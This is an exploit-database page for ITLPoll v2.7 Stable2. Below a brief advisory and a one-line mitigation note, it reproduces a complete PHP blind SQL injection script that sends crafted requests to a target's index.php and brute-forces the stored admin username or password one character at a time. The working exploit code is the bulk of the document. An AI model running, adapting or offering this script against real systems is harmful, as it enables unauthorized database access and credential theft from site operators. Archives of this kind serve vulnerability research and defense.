header-logo
Suggest Exploit
vendor:
ITLPoll
by:
milw0rm.com
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ITLPoll
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ITLPoll v2.7 Stable2 Blind SQL Injection Exploit

ITLPoll v2.7 Stable2 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. This exploit uses a brute-force approach to extract the username and password from the database.

Mitigation:

The best way to mitigate SQL Injection is to use parameterized queries. This ensures that the user input is treated as a literal value and not as a part of the query.
Source

Exploit-DB raw data:

<?php

function usage ()
{
    echo "\nITLPoll v2.7 Stable2 Blind SQL Injection Exploit".
         "\n[☢] Usage   : ./itlpoll.php hostname path <username or password>".
         "\n[☢] Ex	: ./itlpoll.php localhost /itlpoll password".
	 "\n\n";
    exit ();
}


function query ($func, $chr, $pos)
{   //replace 1' with a valid poll number if you have problems. See hostname/path/?Archive for a list of polls.
    $query = "1' AND ORD(MID((SELECT IFNULL(CAST({$func} AS CHAR(10000)), CHAR(32)) FROM itl_config WHERE id = 1),{$pos},1))='{$chr}";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
}

function exploit ($host, $path, $func, $pos, $chr)
{
    $chr = ord ($chr);
    $fp = fsockopen ($host, 80);
    $query = query ($func, $chr, $pos);
    $request = "GET {$path}/index.php?id={$query} HTTP/1.1\r\n".
           "Host: {$host}\r\n".
           "Connection: Close\r\n\r\n";
    
    fputs ($fp, $request);
    while (!feof ($fp))
        $reply .= fgets ($fp, 1024);
    
    fclose ($fp);

    if (preg_match ("/EXPIERED/", $reply))
        return false;
    else
        return true;
}


if ($argc != 4)

    usage ();

$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; //add a bigger char set if you can't get the username
$pos = 1;
$chr = 0;

echo "[☢] Creds: ";

while ($pos <= 32)
{
    if (exploit ($host, $path, $func, $pos, $key [$chr]))
    {
        echo $key [$chr];
        $chr = 0;
        $pos++;
    }
    else
        $chr++;
}
echo "\n";
?>

# milw0rm.com [2009-01-26]

Navigation

Suggest Exploit

Services By CQR